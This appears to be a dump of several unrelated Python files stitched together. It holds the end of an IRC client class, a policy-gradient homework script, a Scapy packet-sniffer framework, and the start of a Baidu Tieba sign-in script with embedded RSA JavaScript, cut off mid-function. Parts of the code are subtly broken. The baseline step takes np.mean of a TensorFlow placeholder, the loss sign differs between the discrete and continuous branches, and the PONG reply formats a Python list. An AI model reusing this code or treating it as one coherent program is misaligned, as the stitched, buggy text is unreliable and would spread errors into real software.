def reconnect(self) -> None:
"""Reconnect to the server."""
if not self.__ingress_thread_should_run.is_set() or not self.__egress_thread_should_run.is_set():
raise IRCConnectionException("Not connected")
# Connect the underlaying socket, may continue indefinetely
# The number of seconds to wait before reconnecting, using exponential backoff
reconnect_wait = 1
while True:
try:
self.__logger.info("Attempting to reconnect")
self.__socket.connect()
except IRCSocketException:
self.__logger.error("Unable to reconnect", exc_info=True)
self.__logger.info("Trying to reconnect again in %ds", reconnect_wait)
sleep(reconnect_wait)
reconnect_wait += reconnect_wait
continue
break
self.__logger.info("Reconnected to server")
self.login()
for channel in self.__channels:
self.join(channel, ignore_duplicate=True)
def disconnect(self) -> None:
"""Disconnect from the server."""
self.__logger.info("Disconnecting from server")
self.__logger.debug("Telling the message threads to stop handling jobs")
self.__ingress_thread_should_run.clear()
self.__egress_thread_should_run.clear()
# Join the threads - waiting for them to complete before returning
# from the disconnect call
self.__logger.debug("Joining message threads")
is_ingress_thread = threading.currentThread() is not self.__ingress_thread
is_egress_thread = threading.currentThread() is not self.__egress_thread
if not is_ingress_thread and not is_egress_thread:
self.__ingress_thread.join()
self.__egress_thread.join()
def send(self, message: str) -> None:
"""Send a raw message to the server."""
if len(message.encode()) > 512:
raise IRCException("Message is too long. Cannot be longer than 512 bytes - was {}"
.format(len(message.encode())))
self.__egress_messages.put(message.encode())
def send_message(self, target: str, message: str) -> None:
"""Send a message."""
self.__logger.debug("Sending message to %s", target)
for line in textwrap.wrap(message, width=(512 - len(target) - 12)):
self.send("PRIVMSG {} :{}\r\n".format(target, line))
def send_notice(self, target: str, notice: str) -> None:
"""Send a notice."""
self.__logger.debug("Sending notice to %s", target)
for line in textwrap.wrap(notice, width=(512 - len(target) - 11)):
self.send("NOTICE {} :{}\r\n".format(target, line))
def join(self, channel: str, ignore_duplicate: bool = False) -> None:
"""Join a channel."""
if not ignore_duplicate and channel in self.__channels:
raise IRCException("Already part of that channel")
self.__logger.info("Joining channel %s", channel)
self.send("JOIN {}\r\n".format(channel))
self.__channels.add(channel)
def __handle_ingress_messages(self) -> None:
"""Threaded ingress entrypoint of the IRC client."""
# Run the connector's main loop for as long as it's not disconnected
while self.__ingress_thread_should_run.is_set():
# Attempt to read once immediately
try:
raw_data = self.__socket.read_all()
except IRCSocketClosedException:
self.__logger.info("Socket has closed, reconnecting")
self.reconnect()
continue
# If there is no data, poll the socket for more data
if raw_data is None:
self.__logger.debug("No data available, waiting %ds", self.__timeout)
try:
self.__socket.wait_for_data(self.__timeout)
except IRCSocketException:
self.__logger.debug("Timeout while reading data - reconnecting")
self.reconnect()
continue
lines = raw_data.decode().splitlines()
self.__logger.debug("Server sent %d lines", len(lines))
for line in lines:
# Try to parse the line using all available message parsers
parsers: Set[Type[IRCBaseMessage]] = {IRCControlMessage, IRCMessage}
messages = [parser.parse(line) for parser in parsers]
# Add each non-null message to the message queue
parsed_messages = [message for message in messages if message is not None]
if len(parsed_messages) == 0:
# Handle pinging internally - don't expose it as a message
if line.startswith("PING"):
self.__logger.debug("Got PING, responding with PONG")
self.send("PONG {}\r\n".format(line.split(" ")[1:]))
else:
self.__logger.debug("Unhandled message: <%s>", line)
else:
# Add all parsed messages to the message queue
for parsed_message in parsed_messages:
self.__ingress_messages.put(parsed_message)
self.__logger.debug("Parsed %d messages and added them to the queue", len(parsed_messages))
def __handle_egress_messages(self) -> None:
"""Threaded egress entrypoint of the IRC client."""
while self.__egress_thread_should_run.is_set():
message = self.__egress_messages.get()
try:
self.__socket.write(message)
self.__egress_messages.task_done()
except IRCSocketException:
self.__logger.error("Unable to send message", exc_info=True)
|
train_pg.py
|
import numpy as np
import tensorflow as tf
import gym
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(
input_placeholder,
output_size,
scope,
n_layers=2,
size=64,
activation=tf.tanh,
output_activation=None
):
#========================================================================================#
# ----------SECTION 3----------
# Network building
#
# Your code should make a feedforward neural network (also called a multilayer perceptron)
# with 'n_layers' hidden layers of size 'size' units.
#
# The output layer should have size 'output_size' and activation 'output_activation'.
#
# Hint: use tf.layers.dense
#========================================================================================#
with tf.variable_scope(scope):
# YOUR_CODE_HERE
output = input_placeholder
for i in range(n_layers):
output = tf.layers.dense(inputs=output, units=size, activation=activation)
output = tf.layers.dense(inputs=output, units=output_size, activation=output_activation)
return output
def pathlength(path):
return len(path["reward"])
#============================================================================================#
# Policy Gradient
#============================================================================================#
def train_PG(exp_name='',
env_name='CartPole-v0',
n_iter=100,
gamma=1.0,
min_timesteps_per_batch=1000,
max_path_length=None,
learning_rate=5e-3,
reward_to_go=True,
animate=True,
logdir=None,
normalize_advantages=True,
nn_baseline=False,
seed=0,
# network arguments
n_layers=1,
size=32
):
start = time.time()
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
locals_ = locals()
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
# Make the gym environment
env = gym.make(env_name)
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
#========================================================================================#
# Notes on notation:
#
# Symbolic variables have the prefix sy_, to distinguish them from the numerical values
# that are computed later in the function
#
# Prefixes and suffixes:
# ob - observation
# ac - action
# _no - this tensor should have shape (batch size /n/, observation dim)
# _na - this tensor should have shape (batch size /n/, action dim)
# _n - this tensor should have shape (batch size /n/)
#
# Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
# is None
#========================================================================================#
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# ----------SECTION 4----------
# Placeholders
#
# Need these for batch observations / actions / advantages in policy gradient loss function.
#========================================================================================#
sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32)
if discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32)
# Define a placeholder for advantages
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
#========================================================================================#
# ----------SECTION 4----------
# Networks
#
# Make symbolic operations for
# 1. Policy network outputs which describe the policy distribution.
# a. For the discrete case, just logits for each action.
#
# b. For the continuous case, the mean / log std of a Gaussian distribution over
# actions.
#
# Hint: use the 'build_mlp' function you defined in utilities.
#
# Note: these ops should be functions of the placeholder 'sy_ob_no'
#
# 2. Producing samples stochastically from the policy distribution.
# a. For the discrete case, an op that takes in logits and produces actions.
#
# Should have shape [None]
#
# b. For the continuous case, use the reparameterization trick:
# The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
#
# mu + sigma * z, z ~ N(0, I)
#
# This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
#
# Should have shape [None, ac_dim]
#
# Note: these ops should be functions of the policy network output ops.
#
# 3. Computing the log probability of a set of actions that were actually taken,
# according to the policy.
#
# Note: these ops should be functions of the placeholder 'sy_ac_na', and the
# policy network output ops.
#
#========================================================================================#
if discrete:
# YOUR_CODE_HERE
sy_logits_na = build_mlp(sy_ob_no, ac_dim, 'sy_logits_na', n_layers, size)
sy_sampled_ac = tf.reshape(tf.multinomial(sy_logits_na, 1), [-1]) # Hint: Use the tf.multinomial op
sy_logprob_n = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=sy_ac_na, logits=sy_logits_na)
else:
# YOUR_CODE_HERE
sy_mean = build_mlp(sy_ob_no, ac_dim, 'sy_logits_na', n_layers, size)
sy_logstd = tf.get_variable('sy_logstd', shape=[ac_dim], dtype=tf.float32) # logstd should just be a trainable variable, not a network output.
sy_std = tf.exp(sy_logstd)
sy_sampled_ac = sy_mean + sy_std * tf.random_normal((tf.shape(sy_mean)[0], ac_dim))
sy_logprob_n = tf.contrib.distributions.MultivariateNormalDiag(sy_mean, sy_std).log_prob(sy_ac_na) # Hint: Use the log probability under a multivariate gaussian.
#========================================================================================#
# ----------SECTION 4----------
# Loss Function and Training Operation
#========================================================================================#
loss = tf.reduce_mean(sy_adv_n * sy_logprob_n) # Loss function that we'll differentiate to get the policy gradient.
update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
#========================================================================================#
# ----------SECTION 5----------
# Optional Baseline
#========================================================================================#
if nn_baseline:
baseline_prediction = tf.squeeze(build_mlp(
sy_ob_no,
1,
"nn_baseline",
n_layers=n_layers,
size=size))
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
# YOUR_CODE_HERE
baseline_target_n = tf.placeholder(shape=[None], name="reward", dtype=tf.float32)
loss_baseline = tf.nn.l2_loss(baseline_target_n - baseline_prediction)
baseline_update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss_baseline)
#========================================================================================#
# Tensorflow Engineering: Config, Session, Variable initialization
#========================================================================================#
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
sess = tf.Session(config=tf_config)
sess.__enter__() # equivalent to `with sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
ob = env.reset()
obs, acs, rewards = [], [], []
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and animate)
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.05)
obs.append(ob)
ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no : ob[None]})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > max_path_length:
break
path = {"observation" : np.array(obs),
"reward" : np.array(rewards),
"action" : np.array(acs)}
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > min_timesteps_per_batch:
break
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
#====================================================================================#
# ----------SECTION 4----------
# Computing Q-values
#
# Your code should construct numpy arrays for Q-values which will be used to compute
# advantages (which will in turn be fed to the placeholder you defined above).
#
# Recall that the expression for the policy gradient PG is
#
# PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
#
# where
#
# tau=(s_0, a_0, ...) is a trajectory,
# Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
# and b_t is a baseline which may depend on s_t.
#
# You will write code for two cases, controlled by the flag 'reward_to_go':
#
# Case 1: trajectory-based PG
#
# (reward_to_go = False)
#
# Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
# entire trajectory (regardless of which time step the Q-value should be for).
#
# For this case, the policy gradient estimator is
#
# E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
#
# where
#
# Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
#
# Thus, you should compute
#
# Q_t = Ret(tau)
#
# Case 2: reward-to-go PG
#
# (reward_to_go = True)
#
# Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
# from time step t. Thus, you should compute
#
# Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
#
#
# Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
# like the 'ob_no' and 'ac_na' above.
#
#====================================================================================#
# YOUR_CODE_HERE
q_i = []
for path in paths:
reward = path["reward"]
if not reward_to_go:
q_i.append(np.ones_like(reward) * np.sum(np.power(gamma, np.arange(len(reward))) * reward, axis=-1))
else:
q_i.append([np.sum([np.power(gamma, t_p - t) * reward[t_p] for t_p in range(t, len(reward))]) for t in range(len(reward))])
q_n = np.concatenate(q_i)
#====================================================================================#
# ----------SECTION 5----------
# Computing Baselines
#====================================================================================#
if nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current or previous batch of Q-values. (Goes with Hint
# #bl2 below.)
b_n = sess.run(baseline_prediction, feed_dict={sy_ob_no : ob_no})
b_n -= np.mean(b_n, axis=0) - np.mean(q_n, axis=0)
b_n /= (np.std(b_n, axis=0) / (np.std(q_n, axis=0) + 1e-4) + 1e-4)
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
#====================================================================================#
# ----------SECTION 4----------
# Advantage Normalization
#====================================================================================#
if normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
# YOUR_CODE_HERE
adv_n -= np.mean(adv_n, axis=0)
adv_n /= np.std(adv_n, axis=0) + 1e-4
#====================================================================================#
# ----------SECTION 5----------
# Optimizing Neural Network Baseline
#====================================================================================#
if nn_baseline:
# ----------SECTION 5----------
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 above.)
# YOUR_CODE_HERE
baseline_input = ob_no
baseline_target = q_n
baseline_target -= np.mean(baseline_target_n, axis=0)
baseline_target /= np.std(baseline_target_n, axis=0) + 1e-4
sess.run(baseline_update_op, feed_dict={sy_ob_no : baseline_input,
baseline_target_n: baseline_target})
#====================================================================================#
# ----------SECTION 4----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
feed_dict = {sy_ob_no : ob_no,
sy_ac_na : ac_na,
sy_adv_n : adv_n}
loss_before = sess.run(loss, feed_dict=feed_dict)
sess.run(update_op, feed_dict=feed_dict)
loss_after = sess.run(loss, feed_dict)
loss_delta = loss_after - loss_before
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("Loss_Delta", loss_delta)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=32)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# Awkward hacky process runs, because Tensorflow does not like
# repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
p.join()
if __name__ == "__main__":
main()
|
sniffer.py
|
# coding: utf-8
import scapy.all as scapy
import threading
import logging
logger = logging.getLogger(__name__)
class StopSniffing(Exception):
"""StopSniffing may raised while processing a packet to indicate stop the sniffer."""
class Sniffer:
"""
Sniffer is the core component of the traffic capture framework.
This class uses the Scapy sniffer to collect packets off the wire. It then
passes them to the modules for processing.
"""
def __init__(self, iface, processor=None, store=False, filter=None, quantum=0.25, modules=None):
"""
Arguments:
iface (str): Name of the interface to listen on.
processor (function(scapy.Packet)): Function to be called each time a packet is intercepted. The given packet is mutable.
store (bool): Whether to store sniffed packets or discard them
filter (str): pcap filter applied to the socket, such that only filtered packets will be processed. See `man pcap-filter` for more detail.
quantum (float): Interval, in seconds, to stop the sniffer to check the stop event.
modules (list(Module)): List of modules to launch the sniffer with.
"""
self.iface = iface
self.processor = processor
self.store = store
self.quantum = quantum
self.filter = filter
self.modules = []
self.packets = []
self._thread = None
self._l2socket = None
self._stopevent = threading.Event()
self._moduleslock = threading.RLock()
self._newmodules = []
self._activemodules = []
if modules is not None:
self.register(*modules)
def register(self, *mods):
"""Add new modules to the sniffer"""
with self._moduleslock:
self.modules.extend(mods)
self._newmodules.extend(mods)
def process(self, pkt):
"""Process the given packet through each active module, and self.processor"""
with self._moduleslock:
for mod in self._activemodules:
try:
mod.process(pkt)
except StopSniffing:
self._stopevent.set()
if self.processor is not None:
try:
self.processor(pkt)
except StopSniffing:
self._stopevent.set()
def run(self):
"""Run the sniffer on the current thread, blocking until it terminates"""
try:
self._l2socket = scapy.conf.L2listen(iface=self.iface, filter=self.filter)
while not self._stopevent.is_set():
# Start any newly added modules.
with self._moduleslock:
while self._newmodules:
mod = self._newmodules.pop()
mod.start(self)
self._activemodules.append(mod)
# Sniff for one quantum, processing packets as we go.
pkts = self._l2socket.sniff(timeout=self.quantum, prn=self.process, store=self.store)
self.packets.extend(pkts)
finally:
# Stop all the active modules and close the sniffing socket.
with self._moduleslock:
while self._activemodules:
self._activemodules.pop().stop()
if self._l2socket is not None:
self._l2socket.close()
self._l2socket = None
def start(self):
"""Start the sniffer on a new thread"""
self._stopevent.clear()
if self._thread is None or not self._thread.is_alive():
with self._moduleslock:
self._newmodules = list(self.modules)
self._activemodules = list()
self._thread = threading.Thread(target=self.run, daemon=True)
self._thread.start()
def stop(self):
"""Signal the sniffer to stop terminate"""
self._stopevent.set()
def join(self):
"""Block until the sniffer thread has terminated"""
if self._thread is not None:
self._thread.join()
def __enter__(self):
self.start()
return self
def __exit__(self, *args, **kwargs):
self.stop()
class Module:
"""
Module provides a feature on top of the sniffing platform.
User defined modules should inherit from this class.
"""
def start(self, sniffer):
"""
Start when the sniffer starts or this module is added to a running sniffer.
"""
def process(self, pkt):
"""
Process will be called for every packet recieved by the sniffer.
Process may raise StopSniffing to signal that the sniffer should terminate.
"""
def stop(self):
"""
Stop will be called when the sniffer stops.
"""
|
tieba_signin.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pprint
import http.cookiejar as cookiejar
import requests
import pickle
import execjs
import time
import random
import getpass
import sys, os
from tkinter import *
import tkinter.messagebox as messagebox
from threading import Thread
from PIL import Image
from io import BytesIO
from bs4 import BeautifulSoup
baiduRSAjs = """
function BarrettMu(t) {
this.modulus = biCopy(t),
this.k = biHighIndex(this.modulus) + 1;
var e = new BigInt;
e.digits[2 * this.k] = 1,
this.mu = biDivide(e, this.modulus),
this.bkplus1 = new BigInt,
this.bkplus1.digits[this.k + 1] = 1,
this.modulo = BarrettMu_modulo,
this.multiplyMod = BarrettMu_multiplyMod,
this.powMod = BarrettMu_powMod
}
function BarrettMu_modulo(t) {
var e = biDivideByRadixPower(t, this.k - 1),
i = biMultiply(e, this.mu),
n = biDivideByRadixPower(i, this.k + 1),
r = biModuloByRadixPower(t, this.k + 1),
o = biMultiply(n, this.modulus),
s = biModuloByRadixPower(o, this.k + 1),
a = biSubtract(r, s);
a.isNeg && (a = biAdd(a, this.bkplus1));
for (var u = biCompare(a, this.modulus) >= 0; u;) a = biSubtract(a, this.modulus), u = biCompare(a, this.modulus) >= 0;
return a
}
function BarrettMu_multiplyMod(t, e) {
var i = biMultiply(t, e);
return this.modulo(i)
}
function BarrettMu_powMod(t, e) {
var i = new BigInt;
i.digits[0] = 1;
for (var n = t, r = e; 0 != (1 & r.digits[0]) && (i = this.multiplyMod(i, n)), r = biShiftRight(r, 1), 0 != r.digits[0] || 0 != biHighIndex(r);) n = this.multiplyMod(n, n);
return i
}
function setMaxDigits(t) {
maxDigits = t, ZERO_ARRAY = new Array(maxDigits);
for (var e = 0; e < ZERO_ARRAY.length; e++) ZERO_ARRAY[e] = 0;
bigZero = new BigInt, bigOne = new BigInt, bigOne.digits[0] = 1
}
function BigInt(t) {
this.digits = "boolean" == typeof t && 1 == t ? null : ZERO_ARRAY.slice(0), this.isNeg = !1
}
function biFromDecimal(t) {
for (var e, i = "-" == t.charAt(0), n = i ? 1 : 0; n < t.length && "0" == t.charAt(n);)++n;
if (n == t.length) e = new BigInt;
else {
var r = t.length - n,
o = r % dpl10;
for (0 == o && (o = dpl10), e = biFromNumber(Number(t.substr(n, o))), n += o; n < t.length;) e = biAdd(biMultiply(e, lr10), biFromNumber(Number(t.substr(n, dpl10)))), n += dpl10;
e.isNeg = i
}
return e
}
function biCopy(t) {
var e = new BigInt(!0);
return e.digits = t.digits.slice(0), e.isNeg = t.isNeg, e
}
function biFromNumber(t) {
var e = new BigInt;
e.isNeg = 0 > t, t = Math.abs(t);
for (var i = 0; t > 0;) e.digits[i++] = t & maxDigitVal, t >>= biRadixBits;
return e
}
function reverseStr(t) {
for (var e = "", i = t.length - 1; i > -1; --i) e += t.charAt(i);
return e
}
function biToString(t, e) {
var i = new BigInt;
i.digits[0] = e;
for (var n = biDivideModulo(t, i), r = hexatrigesimalToChar[n[1].digits[0]]; 1 == biCompare(n[0], bigZero);) n = biDivideModulo(n[0], i), digit = n[1].digits[0], r += hexatrigesimalToChar[n[1].digits[0]];
return (t.isNeg ? "-" : "") + reverseStr(r)
}
function biToDecimal(t) {
var e = new BigInt;
e.digits[0] = 10;
for (var i = biDivideModulo(t, e), n = String(i[1].digits[0]); 1 == biCompare(i[0], bigZero);) i = biDivideModulo(i[0], e), n += String(i[1].digits[0]);
return (t.isNeg ? "-" : "") + reverseStr(n)
}
function digitToHex(t) {
var e = 15,
n = "";
for (i = 0; 4 > i; ++i) n += hexToChar[t & e], t >>>= 4;
return reverseStr(n)
}
function biToHex(t) {
for (var e = "", i = (biHighIndex(t), biHighIndex(t)); i > -1; --i) e += digitToHex(t.digits[i]);
return e
}
function charToHex(t) {
var e, i = 48,
n = i + 9,
r = 97,
o = r + 25,
s = 65,
a = 90;
return e = t >= i && n >= t ? t - i : t >= s && a >= t ? 10 + t - s : t >= r && o >= t ? 10 + t - r : 0
}
function hexToDigit(t) {
for (var e = 0, i = Math.min(t.length, 4), n = 0; i > n; ++n) e <<= 4, e |= charToHex(t.charCodeAt(n));
return e
}
function biFromHex(t) {
for (var e = new BigInt, i = t.length, n = i, r = 0; n > 0; n -= 4, ++r) e.digits[r] = hexToDigit(t.substr(Math.max(n - 4, 0), Math.min(n, 4)));
return e
}
function biFromString(t, e) {
var i = "-" == t.charAt(0),
n = i ? 1 : 0,
r = new BigInt,
o = new BigInt;
o.digits[0] = 1;
for (var s = t.length - 1; s >= n; s--) {
var a = t.charCodeAt(s),
u = charToHex(a),
c = biMultiplyDigit(o, u);
r = biAdd(r, c), o = biMultiplyDigit(o, e)
}
return r.isNeg = i, r
}
function biDump(t) {
return (t.isNeg ? "-" : "") + t.digits.join(" ")
}
function biAdd(t, e) {
var i;
if (t.isNeg != e.isNeg) e.isNeg = !e.isNeg, i = biSubtract(t, e), e.isNeg = !e.isNeg;
else {
i = new BigInt;
for (var n, r = 0, o = 0; o < t.digits.length; ++o) n = t.digits[o] + e.digits[o] + r, i.digits[o] = 65535 & n, r = Number(n >= biRadix);
i.isNeg = t.isNeg
}
return i
}
function biSubtract(t, e) {
var i;
if (t.isNeg != e.isNeg) e.isNeg = !e.isNeg, i = biAdd(t, e), e.isNeg = !e.isNeg;
else {
i = new BigInt;
var n, r;
r = 0;
for (var o = 0; o < t.digits.length; ++o) n = t.digits[o] - e.digits[o] + r, i.digits[o] = 65535 & n, i.digits[o] < 0 && (i.digits[o] += biRadix), r = 0 - Number(0 > n);
if (-1 == r) {
r = 0;
for (var o = 0; o < t.digits.length; ++o) n = 0 - i.digits[o] + r, i.digits[o] = 65535 & n, i.digits[o] < 0 && (i.digits[o] += biRadix), r = 0 - Number(0 > n);
i.isNeg = !t.isNeg
} else i.isNeg = t.isNeg
}
return i
}
function biHighIndex(t) {
for (var e = t.digits.length - 1; e > 0 && 0 == t.digits[e];)--e;
return e
}
function biNumBits(t) {
var e, i = biHighIndex(t),
n = t.digits[i],
r = (i + 1) * bitsPerDigit;
for (e = r; e > r - bitsPerDigit && 0 == (32768 & n); --e) n <<= 1;
return e
}
function biMultiply(t, e) {
for (var i, n, r, o = new BigInt, s = biHighIndex(t), a = biHighIndex(e), u = 0; a >= u; ++u) {
for (i = 0, r = u, j = 0; s >= j; ++j, ++r) n = o.digits[r] + t.digits[j] * e.digits[u] + i, o.digits[r] = n & maxDigitVal, i = n >>> biRadixBits;
o.digits[u + s + 1] = i
}
return o.isNeg = t.isNeg != e.isNeg, o
}
function biMultiplyDigit(t, e) {
var i, n, r;
result = new BigInt, i = biHighIndex(t), n = 0;
for (var o = 0; i >= o; ++o) r = result.digits[o] + t.digits[o] * e + n, result.digits[o] = r & maxDigitVal, n = r >>> biRadixBits;
return result.digits[1 + i] = n, result
}
function arrayCopy(t, e, i, n, r) {
for (var o = Math.min(e + r, t.length), s = e, a = n; o > s; ++s, ++a) i[a] = t[s]
}
function biShiftLeft(t, e) {
var i = Math.floor(e / bitsPerDigit),
n = new BigInt;
arrayCopy(t.digits, 0, n.digits, i, n.digits.length - i);
for (var r = e % bitsPerDigit, o = bitsPerDigit - r, s = n.digits.length - 1, a = s - 1; s > 0; --s, --a) n.digits[s] = n.digits[s] << r & maxDigitVal | (n.digits[a] & highBitMasks[r]) >>> o;
return n.digits[0] = n.digits[s] << r & maxDigitVal, n.isNeg = t.isNeg, n
}
function biShiftRight(t, e) {
var i = Math.floor(e / bitsPerDigit),
n = new BigInt;
arrayCopy(t.digits, i, n.digits, 0, t.digits.length - i);
for (var r = e % bitsPerDigit, o = bitsPerDigit - r, s = 0, a = s + 1; s < n.digits.length - 1; ++s, ++a) n.digits[s] = n.digits[s] >>> r | (n.digits[a] & lowBitMasks[r]) << o;
return n.digits[n.digits.length - 1] >>>= r, n.isNeg = t.isNeg, n
}
function biMultiplyByRadixPower(t, e) {
var i = new BigInt;
return arrayCopy(t.digits, 0, i.digits, e, i.digits.length - e), i
}
function biDivideByRadixPower(t, e) {
var i = new BigInt;
return arrayCopy(t.digits, e, i.digits, 0, i.digits.length - e), i
}
function biModuloByRadixPower(t, e) {
var i = new BigInt;
return arrayCopy(t.digits, 0, i.digits, 0, e), i
}
function biCompare(t, e) {
if (t.isNeg != e.isNeg) return 1 - 2 * Number(t.isNeg);
for (var i = t.digits.length - 1; i >= 0; --i) if (t.digits[i] != e.digits[i]) return t.isNeg ? 1 - 2 * Number(t.digits[i] > e.digits[i]) : 1 - 2 * Number(t.digits[i] < e.digits[i]);
return 0
}
function biDivideModulo(t, e) {
var i, n, r = biNumBits(t),
o = biNumBits(e),
s = e.isNeg;
if (o > r) return t.isNeg ? (i = biCopy(bigOne), i.isNeg = !e.isNeg, t.isNeg = !1, e.isNeg = !1, n = biSubtract(e, t), t.isNeg = !0, e.isNeg = s) : (i = new BigInt, n = biCopy(t)), new Array(i, n);
i = new BigInt, n = t;
for (var a = Math.ceil(o / bitsPerDigit) - 1, u = 0; e.digits[a] < biHalfRadix;) e = biShiftLeft(e, 1), ++u, ++o, a = Math.ceil(o / bitsPerDigit) - 1;
n = biShiftLeft(n, u), r += u;
for (var c = Math.ceil(r / bitsPerDigit) - 1, l = biMultiplyByRadixPower(e, c - a); - 1 != biCompare(n, l);)++i.digits[c - a], n = biSubtract(n, l);
for (var d = c; d > a; --d) {
var f = d >= n.digits.length ? 0 : n.digits[d],
h = d - 1 >= n.digits.length ? 0 : n.digits[d - 1],
g = d - 2 >= n.digits.length ? 0 : n.digits[d - 2],
p = a >= e.digits.length ? 0 : e.digits[a],
m = a - 1 >= e.digits.length ? 0 : e.digits[a - 1];
i.digits[d - a - 1] = f == p ? maxDigitVal : Math.floor((f * biRadix + h) / p);
for (var v = i.digits[d - a - 1] * (p * biRadix + m), b = f * biRadixSquared + (h * biRadix + g); v > b;)--i.digits[d - a - 1], v = i.digits[d - a - 1] * (p * biRadix | m), b = f * biRadix * biRadix + (h * biRadix + g);
l = biMultiplyByRadixPower(e, d - a - 1), n = biSubtract(n, biMultiplyDigit(l, i.digits[d - a - 1])), n.isNeg && (n = biAdd(n, l), --i.digits[d - a - 1])
}
